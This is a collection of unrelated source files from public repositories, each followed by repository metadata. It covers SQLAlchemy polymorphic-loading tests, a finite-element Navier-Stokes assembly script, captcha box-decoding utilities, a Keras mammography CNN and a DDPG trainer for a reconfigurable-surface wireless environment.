def test_threelevel_selectin_to_inline_mapped(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {"polymorphic_load": "selectin"},
"c": {
"subclasses": {
"d": {
"polymorphic_load": "inline",
"single": True,
},
"e": {
"polymorphic_load": "inline",
"single": True,
},
},
"polymorphic_load": "selectin",
},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
q = sess.query(a)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a",
{},
),
Or(
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.e_data AS c_e_data, "
"c.d_data AS c_d_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, "
"c.d_data AS c_d_data, c.e_data AS c_e_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_threelevel_selectin_to_inline_options(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {},
"c": {
"subclasses": {
"d": {"single": True},
"e": {"single": True},
}
},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
c_alias = with_polymorphic(c, (d, e))
q = sess.query(a).options(selectin_polymorphic(a, [b, c_alias]))
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a",
{},
),
Or(
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.e_data AS c_e_data, "
"c.d_data AS c_d_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.d_data AS c_d_data, "
"c.e_data AS c_e_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_threelevel_selectin_to_inline_awkward_alias_options(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {},
"c": {"subclasses": {"d": {}, "e": {}}},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
from sqlalchemy import select
a_table, c_table, d_table, e_table = self.tables("a", "c", "d", "e")
poly = (
select(a_table.c.id, a_table.c.type, c_table, d_table, e_table)
.select_from(
a_table.join(c_table).outerjoin(d_table).outerjoin(e_table)
)
.set_label_style(LABEL_STYLE_TABLENAME_PLUS_COL)
.alias("poly")
)
c_alias = with_polymorphic(c, (d, e), poly)
q = (
sess.query(a)
.options(selectin_polymorphic(a, [b, c_alias]))
.order_by(a.id)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a ORDER BY a.id",
{},
),
Or(
# here, the test is that the adaptation of "a" takes place
CompiledSQL(
"SELECT poly.a_type AS poly_a_type, "
"poly.c_id AS poly_c_id, "
"poly.a_id AS poly_a_id, poly.c_c_data AS poly_c_c_data, "
"poly.e_id AS poly_e_id, poly.e_e_data AS poly_e_e_data, "
"poly.d_id AS poly_d_id, poly.d_d_data AS poly_d_d_data "
"FROM (SELECT a.id AS a_id, a.type AS a_type, "
"c.id AS c_id, "
"c.c_data AS c_c_data, d.id AS d_id, "
"d.d_data AS d_d_data, "
"e.id AS e_id, e.e_data AS e_e_data FROM a JOIN c "
"ON a.id = c.id LEFT OUTER JOIN d ON c.id = d.id "
"LEFT OUTER JOIN e ON c.id = e.id) AS poly "
"WHERE poly.a_id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY poly.a_id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT poly.a_type AS poly_a_type, "
"poly.c_id AS poly_c_id, "
"poly.a_id AS poly_a_id, poly.c_c_data AS poly_c_c_data, "
"poly.d_id AS poly_d_id, poly.d_d_data AS poly_d_d_data, "
"poly.e_id AS poly_e_id, poly.e_e_data AS poly_e_e_data "
"FROM (SELECT a.id AS a_id, a.type AS a_type, "
"c.id AS c_id, c.c_data AS c_c_data, d.id AS d_id, "
"d.d_data AS d_d_data, e.id AS e_id, "
"e.e_data AS e_e_data FROM a JOIN c ON a.id = c.id "
"LEFT OUTER JOIN d ON c.id = d.id "
"LEFT OUTER JOIN e ON c.id = e.id) AS poly "
"WHERE poly.a_id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY poly.a_id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_partial_load_no_invoke_eagers(self):
# test issue #4199
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"a1": {"polymorphic_load": "selectin"},
"a2": {"polymorphic_load": "selectin"},
}
}
}
)
a, a1, a2 = self.classes("a", "a1", "a2")
sess = fixture_session()
a1_obj = a1()
a2_obj = a2()
sess.add_all([a1_obj, a2_obj])
del a2_obj
sess.flush()
sess.expire_all()
# _with_invoke_all_eagers(False), used by the lazy loader
# strategy, will cause one less state to be present such that
# the poly loader won't locate a state limited to the "a1" mapper,
# needs to test that it has states
sess.query(a)._with_invoke_all_eagers(False).all()
class LoaderOptionsTest(
fixtures.DeclarativeMappedTest, testing.AssertsExecutionResults
):
@classmethod
def setup_classes(cls):
Base = cls.DeclarativeBasic
class Parent(fixtures.ComparableEntity, Base):
__tablename__ = "parent"
id = Column(Integer, primary_key=True)
class Child(fixtures.ComparableEntity, Base):
__tablename__ = "child"
id = Column(Integer, primary_key=True)
parent_id = Column(Integer, ForeignKey("parent.id"))
parent = relationship("Parent", backref=backref("children"))
type = Column(String(50), nullable=False)
__mapper_args__ = {"polymorphic_on": type}
class ChildSubclass1(Child):
__tablename__ = "child_subclass1"
id = Column(Integer, ForeignKey("child.id"), primary_key=True)
__mapper_args__ = {
"polymorphic_identity": "subclass1",
"polymorphic_load": "selectin",
}
class Other(fixtures.ComparableEntity, Base):
__tablename__ = "other"
id = Column(Integer, primary_key=True)
child_subclass_id = Column(
Integer, ForeignKey("child_subclass1.id")
)
child_subclass = relationship(
"ChildSubclass1", backref=backref("others")
)
@classmethod
def insert_data(cls, connection):
Parent, ChildSubclass1, Other = cls.classes(
"Parent", "ChildSubclass1", "Other"
)
session = Session(connection)
parent = Parent(id=1)
subclass1 = ChildSubclass1(id=1, parent=parent)
other = Other(id=1, child_subclass=subclass1)
session.add_all([parent, subclass1, other])
session.commit()
def test_options_dont_pollute_baked(self):
self._test_options_dont_pollute(True)
def test_options_dont_pollute_unbaked(self):
self._test_options_dont_pollute(False)
def _test_options_dont_pollute(self, enable_baked):
Parent, ChildSubclass1, Other = self.classes(
"Parent", "ChildSubclass1", "Other"
)
session = fixture_session(enable_baked_queries=enable_baked)
def no_opt():
q = session.query(Parent).options(
joinedload(Parent.children.of_type(ChildSubclass1))
)
return self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT parent.id AS parent_id, "
"anon_1.child_id AS anon_1_child_id, "
"anon_1.child_parent_id AS anon_1_child_parent_id, "
"anon_1.child_type AS anon_1_child_type, "
"anon_1.child_subclass1_id AS anon_1_child_subclass1_id "
"FROM parent "
"LEFT OUTER JOIN (SELECT child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type, "
"child_subclass1.id AS child_subclass1_id "
"FROM child "
"LEFT OUTER JOIN child_subclass1 "
"ON child.id = child_subclass1.id) AS anon_1 "
"ON parent.id = anon_1.child_parent_id",
{},
),
CompiledSQL(
"SELECT child_subclass1.id AS child_subclass1_id, "
"child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type "
"FROM child JOIN child_subclass1 "
"ON child.id = child_subclass1.id "
"WHERE child.id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY child.id",
[{"primary_keys": [1]}],
),
)
result = no_opt()
with self.assert_statement_count(testing.db, 1):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
session.expunge_all()
q = session.query(Parent).options(
joinedload(Parent.children.of_type(ChildSubclass1)).joinedload(
ChildSubclass1.others
)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT parent.id AS parent_id, "
"anon_1.child_id AS anon_1_child_id, "
"anon_1.child_parent_id AS anon_1_child_parent_id, "
"anon_1.child_type AS anon_1_child_type, "
"anon_1.child_subclass1_id AS anon_1_child_subclass1_id, "
"other_1.id AS other_1_id, "
"other_1.child_subclass_id AS other_1_child_subclass_id "
"FROM parent LEFT OUTER JOIN "
"(SELECT child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type, "
"child_subclass1.id AS child_subclass1_id "
"FROM child LEFT OUTER JOIN child_subclass1 "
"ON child.id = child_subclass1.id) AS anon_1 "
"ON parent.id = anon_1.child_parent_id "
"LEFT OUTER JOIN other AS other_1 "
"ON anon_1.child_subclass1_id = other_1.child_subclass_id",
{},
),
CompiledSQL(
"SELECT child_subclass1.id AS child_subclass1_id, "
"child.id AS child_id, child.parent_id AS child_parent_id, "
"child.type AS child_type, other_1.id AS other_1_id, "
"other_1.child_subclass_id AS other_1_child_subclass_id "
"FROM child JOIN child_subclass1 "
"ON child.id = child_subclass1.id "
"LEFT OUTER JOIN other AS other_1 "
"ON child_subclass1.id = other_1.child_subclass_id "
"WHERE child.id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY child.id",
[{"primary_keys": [1]}],
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
session.expunge_all()
result = no_opt()
with self.assert_statement_count(testing.db, 1):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
class IgnoreOptionsOnSubclassAttrLoad(fixtures.DeclarativeMappedTest):
"""test #7304 and related cases
in this case we trigger the subclass attribute load, while at the same
time there will be a deferred loader option present in the state's
options that was established by the previous loader.
test both that the option takes effect (i.e. raiseload) and that a deferred
loader doesn't interfere with the mapper's load of the attribute.
"""
@classmethod
def setup_classes(cls):
Base = cls.DeclarativeBasic
class Parent(Base):
__tablename__ = "parent"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
entity_id = Column(ForeignKey("entity.id"))
entity = relationship("Entity")
class Entity(Base):
__tablename__ = "entity"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
type = Column(String(32))
__mapper_args__ = {
"polymorphic_on": type,
"polymorphic_identity": "entity",
}
class SubEntity(Entity):
__tablename__ = "sub_entity"
id = Column(ForeignKey(Entity.id), primary_key=True)
name = Column(String(32))
__mapper_args__ = {"polymorphic_identity": "entity_two"}
@classmethod
def insert_data(cls, connection):
Parent, SubEntity = cls.classes("Parent", "SubEntity")
with Session(connection) as session:
session.add(Parent(entity=SubEntity(name="some name")))
session.commit()
@testing.combinations(
defaultload,
joinedload,
selectinload,
lazyload,
argnames="first_option",
)
@testing.combinations(
("load_only", "id", True),
("defer", "name", True),
("undefer", "name", True),
("raise", "name", False),
(None, None, True),
# these don't seem possible at the moment as the "type" column
# doesn't load and it can't recognize the polymorphic identity.
# we assume load_only() is smart enough to include this column
# ("defer", '*', True),
# ("undefer", '*', True),
# ("raise", '*', False),
argnames="second_option,second_argument,expect_load",
)
def test_subclass_loadattr(
self, first_option, second_option, second_argument, expect_load
):
Parent, Entity, SubEntity = self.classes(
"Parent", "Entity", "SubEntity"
)
stmt = select(Parent)
will_lazyload = first_option in (defaultload, lazyload)
opt = first_option(Parent.entity)
if second_argument == "name":
second_argument = SubEntity.name
elif second_argument == "id":
second_argument = Entity.id
if second_option is None:
sub_opt = opt
elif second_option == "raise":
sub_opt = opt.defer(second_argument, raiseload=True)
else:
sub_opt = getattr(opt, second_option)(second_argument)
stmt = stmt.options(sub_opt)
session = fixture_session()
result = session.execute(stmt).scalars()
parent_obj = result.first()
entity_id = parent_obj.__dict__["entity_id"]
with assertsql.assert_engine(testing.db) as asserter_:
if expect_load:
eq_(parent_obj.entity.name, "some name")
else:
with expect_raises_message(
exc.InvalidRequestError,
"'SubEntity.name' is not available due to raiseload=True",
):
parent_obj.entity.name
expected = []
if will_lazyload:
expected.append(
CompiledSQL(
"SELECT entity.id AS entity_id, "
"entity.type AS entity_type FROM entity "
"WHERE entity.id = :pk_1",
[{"pk_1": entity_id}],
)
)
if second_option in ("undefer", "load_only", None):
# load will be a mapper optimized load for the name alone
expected.append(
CompiledSQL(
"SELECT sub_entity.name AS sub_entity_name "
"FROM sub_entity "
"WHERE :param_1 = sub_entity.id",
[{"param_1": entity_id}],
)
)
elif second_option == "defer":
# load will be a deferred load. this is because the explicit
# call to the deferred load put a deferred loader on the attribute
expected.append(
CompiledSQL(
"SELECT sub_entity.name AS sub_entity_name FROM entity "
"JOIN sub_entity ON entity.id = sub_entity.id "
"WHERE entity.id = :pk_1",
[{"pk_1": entity_id}],
)
)
asserter_.assert_(*expected)
| jorgemorgado/sqlalchemy | test/orm/inheritance/test_poly_loading.py | test_poly_loading.py | py | 31,456 | python | en | code | 1 | github-code | 50 |
30688863609 | import numpy as np
import scipy.io as scio
# 本地地址:D:\FluidSim\FluidSim\FEMNEW\Navier-stokes-Satsit14master
tmax = 100
celem = scio.loadmat('celem.mat')['celem'] - 1
node = scio.loadmat('node.mat')['node']
nmax = 341
u0 = np.ones((nmax))
v0 = np.zeros((nmax))
numOfElements = 100
for t in range(0,tmax):
# Assembly matrix
for e in range(numOfElements):
xp = np.array([-np.sqrt(3/5),0,np.sqrt(3/5)])
wp = np.array([5/9,8/9,5/9])
w = np.zeros((9))
gp = np.zeros((9,2))
ngp = 9
for i in range(3):
for j in range(3):
idx = int(3 * i + j)
w[idx] = wp[i] * wp[j]
gp[idx,0] = xp[j]
gp[idx,1] = xp[i]
N = np.zeros((8,9))
dN = np.zeros((2,8,9))
M = np.zeros((4,9))
dM = np.zeros((2,4,9))
A1 = np.zeros((8,8))
A2 = np.zeros((8,4))
A8 = np.zeros((8,4))
A4 = np.zeros((4,8))
A6 = np.zeros((4,8))
for k in range(ngp):
xi = gp[k,0]
eta = gp[k,1]
N[0,k] = -(1 - xi) * (1 - eta) * (1 + xi + eta) / 4
N[1,k] = (1 - 2*xi)*(1 - eta) / 2
N[2,k] = -(1 + xi)*(1 - eta)*(1 - xi + eta) / 4
N[3,k] = (1 + xi)*(1 - eta**2) / 2
N[4,k] = -(1 + xi)*(1 + eta)*(1 - xi - eta) / 4
N[5,k] = (1 - xi**2)*(1 + eta)/2
N[6,k] = -(1 - xi)*(1 + eta)*(1 + xi - eta)/4
N[7,k] = (1 - xi)*(1 - eta**2)/2
dN[0,0,k] = (1 - eta) * (2 * xi + eta) / 4
dN[0,1,k] = - xi * (1 - eta)
dN[0,2,k] = (eta - 1)*(eta - 2*xi)/4
dN[0,3,k] = (1 - eta**2)/2
dN[0,4,k] = (eta + 1)*(eta + 2*xi)/4
dN[0,5,k] = - xi * (eta + 1)
dN[0,6,k] = -(1 + eta)*(eta - 2*xi)/4
dN[0,7,k] = (-1 + eta**2) / 2
dN[1,0,k] = (1 - xi)*(2 * eta + xi)/4
dN[1,1,k] = (-1 + xi**2)/2
dN[1,2,k] = (1 + xi)*(2*eta - xi)/4
dN[1,3,k] = -eta*(1 + xi)
dN[1,4,k] = (1 + xi)*(xi + 2*eta)/4
dN[1,5,k] = (1 - xi**2)/2
dN[1,6,k] = (1 - xi)*(2*eta - xi)/4
dN[1,7,k] = eta * (xi - 1)
M[0,k] = (1 - xi)*(1 - eta)/4
M[1,k] = (1 + xi)*(1 - eta)/4
M[2,k] = (1 + xi)*(1 + eta)/4
M[3,k] = (1 - xi)*(1 + eta)/4
dM[0,0,k] = - (1 - eta)/4
dM[0,1,k] = (1 - eta)/4
dM[0,2,k] = (1 + eta)/4
dM[0,3,k] = - (1 + eta)/4
dM[1,0,k] = - (1 + eta)/4
dM[1,1,k] = -(1 + xi)/4
dM[1,2,k] = (1 + xi)/4
dM[1,3,k] = (1 - xi)/4
for k in range(ngp):
ubar = 0
vbar = 0
for i in range(8):
ubar = ubar + N[i,k] * u0[i]
vbar = vbar + N[i,k] * v0[i]
coord8 = np.zeros((8,2))
for i in range(8):
coord8[i,:] = node[celem[e,i],:]
coord4 = np.zeros((4,2))
for i in range(4):
coord4[i,:] = node[celem[e,i+8],:]
Jacob8 = np.dot(dN[:,:,k],coord8[:,:])
detJac = abs(np.linalg.det(Jacob8))
Jinv8 = np.linalg.inv(Jacob8)
gdN = np.zeros((2,8))
for i in range(2):
for j in range(2):
gdN[i,:] += Jinv8[i,j]*dN[j,:,k]
Re = 1
for i in range(8):
for j in range(8):
A1[i,j] = A1[i,j] + w[k] * (N[i,k] * ubar * gdN[0,j] + N[i,k] * vbar * gdN[1,j] +
(gdN[0,i] * gdN[0,j] + gdN[1,i] * gdN[1,j])/Re) * detJac
A9 = A1.copy()
Jacob4 = np.dot(dM[:,:,k],coord4[:,:])
Jinv4 = np.linalg.inv(Jacob8)
gdM = np.zeros((2,4))
for i in range(2):
for j in range(2):
gdM[i,:] += Jinv4[i,j]*dM[j,:,k]
detJac4 = abs(np.linalg.det(Jacob4))
for i in range(8):
for j in range(4):
A2[i,j] = A2[i,j] + w[k]*N[i,k]*gdM[0,j]*detJac4
A8[i,j] = A8[i,j] + w[k]*N[i,k]*gdM[1,j]*detJac4
for i in range(4):
for j in range(8):
A4[i,j] = A4[i,j] + w[k]*M[i,k]*gdN[0,j]*detJac4
A6[i,j] = A6[i,j] + w[k]*M[i,k]*gdN[1,j]*detJac4
tes = 1
| clatterrr/NumericalComputation | FiniteElement/NavierStokes-satsit/demo0.py | demo0.py | py | 4,724 | python | en | code | 3 | github-code | 50 |
28418624655 | S = input()
T = input()
list = []
for i in range(len(S)):
list.append(S[0:i] + S[i + 1:])
c = 0
for l in list:
if T == l:
c += 1
print(c)
| mk668a/python_aoj | ateamTest/ateam2.py | ateam2.py | py | 154 | python | en | code | 0 | github-code | 50 |
13293220023 | import numpy
import PIL
def draw_boxes(img, boxes, digits, digit_width, digit_height):
img_out = img.copy()
draw = PIL.ImageDraw.Draw(img_out)
for i in range(len(boxes)):
color = numpy.random.randint(0, 255, 3)
x = boxes[i]
draw.polygon([
(x-digit_width/2, 3),
(x+digit_width/2, 3),
(x+digit_width/2, digit_height-3),
(x-digit_width/2, digit_height-3)
],
outline=(color[0], color[1], color[2], 0))
draw.text((x-digit_width/2+2, 5), str(digits[i]), fill=(0,0,0,128))
return img_out
def decode_output(confidence, box_shift, digit, position_width, positions, digit_width):
thr = 0.5
ret_dig = []
ret_box = []
ditits_bb = (box_shift-0.5)*2*position_width + (0.5+numpy.arange(positions))*position_width
while 1:
max_confidence = numpy.argmax(confidence)
if(confidence[max_confidence] < thr):
break
max_pos = ditits_bb[max_confidence]
ret_dig.append(digit[max_confidence])
ret_box.append(ditits_bb[max_confidence])
merge_box = numpy.where(numpy.abs(ditits_bb-max_pos) < digit_width/2)
confidence[merge_box] = 0
if(len(ret_box)):
ret_box, ret_dig = zip(*sorted(zip(ret_box, ret_dig)))
return (ret_dig, ret_box)
| nagos/captcha-yolo | utils.py | utils.py | py | 1,372 | python | en | code | 4 | github-code | 50 |
70579723675 | import os
import numpy as np
import threading as thr
import matplotlib.pyplot as plt
from sklearn .model_selection import train_test_split
from sklearn .metrics import roc_curve, auc
from keras.models import Sequential
from keras.layers import Conv2D, BatchNormalization, MaxPool2D, Dense, Flatten, InputLayer, Activation, Dropout
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from tensorflow.keras.optimizers import SGD
import matlab.engine
def create_dataset(lista, o_img, f_img, labels):
"""Function calling the Matlab file in order to filter the images.
Arguments
---------
lista : list
Chunk of file directories.
Return:
Dataset with all the images filtered.
"""
for element in lista:
if "_1_resized.pgm" in element:
mo, mf = eng.dataset_filtered(eng.char(os.path.join(data_folder, element)), nargout = 2)
o_img.append(mo)
f_img.append(mf)
labels.append(1.)
elif "_2_resized.pgm" in element:
mo, mf = eng.dataset_filtered(eng.char(os.path.join(data_folder, element)), nargout = 2)
o_img.append(mo)
f_img.append(mf)
labels.append(0)
def cnn_o(shape=(125, 125, 1)):
"""CNN original mammo model.
Arguments
---------
shape : tuple
Size.
Return:
Dataset with all the images filtered.
"""
model = Sequential([
Conv2D(4, (3,3), padding = 'same', input_shape = shape),
BatchNormalization(),
Activation('relu'),
MaxPool2D((6,6), strides = 2),
#Dropout(0.2),
Conv2D(7, (3,3), padding = 'same'),
BatchNormalization(),
Activation('relu'),
MaxPool2D((6,6), strides = 2),
#Dropout(0.1),
Conv2D(10, (3,3), padding = 'same'),
BatchNormalization(),
Activation('relu'),
MaxPool2D((6,6), strides = 2),
#Dropout(0.1),
Flatten(),
Dense(10, activation = 'relu'),
#Dropout(0.1),
Dense(1, activation = 'sigmoid')
])
return model
if __name__ == '__main__':
eng = matlab.engine.start_matlab()
mammo_o, mammo_f, label = [], [], []
data_folder = "C:/Users/anapascual/exam_project/dataset/"
os.chdir(data_folder)
l = os.listdir()
os.chdir("C:/Users/anapascual/exam_project/")
threads = []
chunk = 6
for i in range(49):
t = thr.Thread(target = create_dataset, args = (l[i*chunk : (i+1)*chunk], mammo_o, mammo_f, label))
threads.append(t)
t.start()
for j in threads:
j.join()
eng.quit()
mammo_o = np.asarray(mammo_o, dtype = 'float32')/255.
mammo_f = np.asarray(mammo_f, dtype = 'float32')/255.
label = np.asarray(label)
mammo_o_4d = np.reshape(mammo_o, (147, 125, 125, 1))
mammo_f_4d = np.reshape(mammo_f, (147, 64, 64, 1))
model_o = cnn_o()
model_o.summary()
learning_rate = 0.001
model_o.compile(optimizer = SGD(learning_rate, momentum = 0.9), loss = 'binary_crossentropy', metrics = ['accuracy'])
reduce_on_plateau = ReduceLROnPlateau(
monitor="val_loss",
factor=0.1,
patience=10,
verbose=0,
mode="auto",
min_delta=0.0001,
cooldown=0,
min_lr=0)
X_train_o, X_val_o, Y_train_o, Y_val_o = train_test_split(mammo_o_4d, label, test_size = 0.2, random_state = 44)
batch_size = 21
traino = model_o.fit(X_train_o, Y_train_o,
batch_size = batch_size,
epochs = 200,
verbose=1,
validation_data=(X_val_o, Y_val_o),
callbacks = [reduce_on_plateau])
acc = traino.history['accuracy']
val_acc = traino.history['val_accuracy']
loss = traino.history['loss']
val_loss = traino.history['val_loss']
epochs_range = range(1, len(acc)+1)
#Train and validation accuracy
plt.figure(figsize=(15, 15))
plt.subplot(2, 2, 1)
plt.plot(epochs_range, acc, label='Training Accuracy')
plt.plot(epochs_range, val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
#Train and validation loss
plt.subplot(2, 2, 2)
plt.plot(epochs_range, loss, label='Training Loss')
plt.plot(epochs_range, val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.title('Training and Validation Loss')
plt.show()
_, val_acc = model_o.evaluate(X_val_o, Y_val_o, verbose=0)
print('Validation accuracy: %.3f' % (val_acc))
preds = model_o.predict(X_val_o, verbose=1)
#Compute Receiver operating characteristic (ROC)
fpr, tpr, _ = roc_curve(Y_val_o, preds)
roc_auc = auc(fpr, tpr)
#Plot of a ROC curve
plt.figure()
lw = 2
plt.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic example')
plt.legend(loc="lower right")
plt.show()
| bitgio/CMEPDA_final_project | cnn_original.py | cnn_original.py | py | 5,367 | python | en | code | 0 | github-code | 50 |
2794402768 | import argparse
import os
import numpy as np
import torch
import DDPG
import utils
import environment
def whiten(state):
return (state - np.mean(state)) / np.std(state)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Choose the type of the experiment
parser.add_argument('--experiment_type', default='custom', choices=['custom', 'power', 'rsi_elements', 'learning_rate', 'decay'],
help='Choose one of the experiment types to reproduce the learning curves given in the paper')
# Training-specific parameters
parser.add_argument("--policy", default="DDPG", help='Algorithm (default: DDPG)')
parser.add_argument("--env", default="RIS_MISO", help='OpenAI Gym environment name')
parser.add_argument("--seed", default=0, type=int, help='Seed number for PyTorch and NumPy (default: 0)')
parser.add_argument("--gpu", default="0", type=int, help='GPU ordinal for multi-GPU computers (default: 0)')
parser.add_argument("--start_time_steps", default=0, type=int, metavar='N', help='Number of exploration time steps sampling random actions (default: 0)')
parser.add_argument("--buffer_size", default=100000, type=int, help='Size of the experience replay buffer (default: 100000)')
parser.add_argument("--batch_size", default=16, metavar='N', help='Batch size (default: 16)')
parser.add_argument("--save_model", action="store_true", help='Save model and optimizer parameters')
parser.add_argument("--load_model", default="", help='Model load file name; if empty, does not load')
# Environment-specific parameters
parser.add_argument("--num_antennas", default=4, type=int, metavar='N', help='Number of antennas in the BS')
parser.add_argument("--num_RIS_elements", default=4, type=int, metavar='N', help='Number of RIS elements')
parser.add_argument("--num_users", default=4, type=int, metavar='N', help='Number of users')
parser.add_argument("--power_t", default=30, type=float, metavar='N', help='Transmission power for the constrained optimization in dB')
parser.add_argument("--num_time_steps_per_eps", default=10000, type=int, metavar='N', help='Maximum number of steps per episode (default: 20000)')
parser.add_argument("--num_eps", default=10, type=int, metavar='N', help='Maximum number of episodes (default: 5000)')
parser.add_argument("--awgn_var", default=1e-2, type=float, metavar='G', help='Variance of the additive white Gaussian noise (default: 0.01)')
parser.add_argument("--channel_est_error", default=False, type=bool, help='Noisy channel estimate? (default: False)')
# Algorithm-specific parameters
parser.add_argument("--exploration_noise", default=0.0, metavar='G', help='Std of Gaussian exploration noise')
parser.add_argument("--discount", default=0.99, metavar='G', help='Discount factor for reward (default: 0.99)')
parser.add_argument("--tau", default=1e-3, type=float, metavar='G', help='Learning rate in soft/hard updates of the target networks (default: 0.001)')
parser.add_argument("--lr", default=1e-3, type=float, metavar='G', help='Learning rate for the networks (default: 0.001)')
parser.add_argument("--decay", default=1e-5, type=float, metavar='G', help='Decay rate for the networks (default: 0.00001)')
args = parser.parse_args()
print("---------------------------------------")
print(f"Policy: {args.policy}, Env: {args.env}, Seed: {args.seed}")
print("---------------------------------------")
file_name = f"{args.num_antennas}_{args.num_RIS_elements}_{args.num_users}_{args.power_t}_{args.lr}_{args.decay}"
if not os.path.exists(f"./Learning Curves/{args.experiment_type}"):
os.makedirs(f"./Learning Curves/{args.experiment_type}")
if args.save_model and not os.path.exists("./Models"):
os.makedirs("./Models")
env = environment.RIS_MISO(args.num_antennas, args.num_RIS_elements, args.num_users, AWGN_var=args.awgn_var)
# Set seeds
torch.manual_seed(args.seed)
np.random.seed(args.seed)
state_dim = env.state_dim
action_dim = env.action_dim
max_action = 1
device = torch.device(f"cuda:{args.gpu}" if torch.cuda.is_available() else "cpu")
kwargs = {
"state_dim": state_dim,
"action_dim": action_dim,
"power_t": args.power_t,
"max_action": max_action,
"M": args.num_antennas,
"N": args.num_RIS_elements,
"K": args.num_users,
"actor_lr": args.lr,
"critic_lr": args.lr,
"actor_decay": args.decay,
"critic_decay": args.decay,
"device": device,
"discount": args.discount,
"tau": args.tau
}
# Initialize the algorithm
agent = DDPG.DDPG(**kwargs)
if args.load_model != "":
policy_file = file_name if args.load_model == "default" else args.load_model
agent.load(f"./models/{policy_file}")
replay_buffer = utils.ExperienceReplayBuffer(state_dim, action_dim, max_size=args.buffer_size)
# Initialize the instant rewards recording array
instant_rewards = []
max_reward = 0
for eps in range(int(args.num_eps)):
state, done = env.reset(), False
episode_reward = 0
episode_num = 0
episode_time_steps = 0
state = whiten(state)
eps_rewards = []
for t in range(int(args.num_time_steps_per_eps)):
# Choose action from the policy
action = agent.select_action(np.array(state))
# Take the selected action
next_state, reward, done, _ = env.step(action)
done = 1.0 if t == args.num_time_steps_per_eps - 1 else float(done)
# Store data in the experience replay buffer
replay_buffer.add(state, action, next_state, reward, done)
state = next_state
episode_reward += reward
state = whiten(state)
if reward > max_reward:
max_reward = reward
# Train the agent
agent.update_parameters(replay_buffer, args.batch_size)
print(f"Time step: {t + 1} Episode Num: {episode_num + 1} Reward: {reward:.3f}")
eps_rewards.append(reward)
episode_time_steps += 1
if done:
print(f"\nTotal T: {t + 1} Episode Num: {episode_num + 1} Episode T: {episode_time_steps} Max. Reward: {max_reward:.3f}\n")
# Reset the environment
state, done = env.reset(), False
episode_reward = 0
episode_time_steps = 0
episode_num += 1
state = whiten(state)
instant_rewards.append(eps_rewards)
np.save(f"./Learning Curves/{args.experiment_type}/{file_name}_episode_{episode_num + 1}", instant_rewards)
if args.save_model:
agent.save(f"./Models/{file_name}")
